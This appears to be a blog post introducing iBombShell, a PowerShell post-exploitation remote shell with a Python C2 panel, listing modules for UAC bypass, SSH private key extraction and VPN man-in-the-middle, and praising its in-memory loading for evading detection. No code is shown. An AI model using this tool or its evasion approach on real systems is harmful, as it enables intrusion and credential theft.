Consider you have a shell on a system and other post-exploitation do not work for you as they are being caught by a security solution on the system. Worry not as we now have iBombShell, a dynamic remote shell that can be run on any system that supports PowerShell. The reason this is called dynamic is because functions can be dynamically added and loaded as per your requirement.
What is iBombShell?
iBombShell is a dynamic, open source tool that allows post-exploitation functionalities via a shell or a prompt on systems that support PowerShell. Supported features are loaded
dynamically in-memory avoiding any hard drive writes, whenever they are needed from a repository. The tool has hard coded GitHub links, which can be changed to your own. This makes detection even more difficult as security systems now-a-days are on a lookout for data going to and from online repositories.
Connect backs are called as ‘warriors‘ and they do the work for you. iBombShell has two execution modes:
- everywhere: In this mode, you simply run a PowerShell command which is directly run from the memory.
- silent mode: In this mode, you still run the PowerShell command, however, this time it can now be controlled by a C2 panel that is coded in Python which listens for connections from warriors.
The functionality provided by iBombShell is divided into event, scanner, system, bypassuac, & post-exploitation categories. As of now, the following functionalities are supported:
- events/txuleta: Prints static text.
- scanner/tcp-scan: Uses the PowerShell System.Net.Sockets.TcpClient class to connect to a port and report back if it is open.
- system/loaderext: Loads additional functions after downloading them.
- system/getprovider: Makes use of get-childitem.
- system/pshell: Executes PowerShell instructions.
- system/pshell-local: Executes PowerShell instructions in the same scope that iBombShell.
- system/clearfunction: Removes a loaded function.
- bypassuac/invoke-eventvwr: Bypasses UAC using a ‘fileless’ technique using eventvwr.exe.
- bypassuac/invoke-compmgmtlauncher: Attains UAC bypass via DLL hijacking using CompMgmtLauncher.exe.
- bypassuac/invoke-environmentinjection: Attains UAC bypass by creating %windir% injection.
- post/extract-sshprivatekey: Extracts SSH Private Keys in Microsoft Windows 10 via the
HKCU\Software\OpenSSH\Agent\Keysregistry path. - post/vpn-mitm: Creates a VPN man-in-the-middle using rasdial.exe
In case the UAC bypass method succeeds, a new warrior is created with a new ID and executed in a higher privileges. You can now imagine all that you can do with this tool!
Download iBombShell:
The iBombShell source code for version 0.0.1b, code named – “the first boom” can be found at this link. Installation is also pretty simple if you want to use the python C2 panel.
